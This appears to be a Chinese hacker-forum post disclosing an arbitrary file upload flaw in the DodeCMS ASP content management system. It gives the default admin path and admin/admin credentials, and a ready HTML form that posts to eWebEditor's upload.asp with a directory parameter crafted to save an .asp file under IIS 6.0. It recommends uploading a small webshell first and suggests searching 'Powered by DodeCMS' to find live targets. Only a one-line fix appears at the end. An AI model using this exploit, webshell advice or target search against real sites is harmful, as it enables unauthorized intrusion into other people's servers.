DodeCMS成创网站内容管理系统由辽宁成创网络科技有限公司基于微软ASP、通用ACCESS数据库开发完成;
访问模式采用动态模式,基本上实现了系统的自定义功能,代码简洁高效,易于修改维护,可扩展性强。
默认后台路径:admin/
默认后台用户名密码:admin
官方网站:http:、、www。dodecms。com/、
前提: IIS 6.0 + Asp 环境
漏洞文件:admin/eWebEditor/asp/upload.asp 代码略,成因略。(想知道自己百度)
利用代码:
<form action="http://www.hackqing.com/admin/eWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>
有图有真像(建议先传小马):
测试:
Powered by DodeCMS
多的自己找关键词。天朝法令不允许。自己悠着点。
测试报告:Powered by DodeCMSV1.1
测试目标:http://www.*******.net/bug.txt
修补:增加验证\更改路径\或直接删除。
By:Mr.DzY,由情整理编辑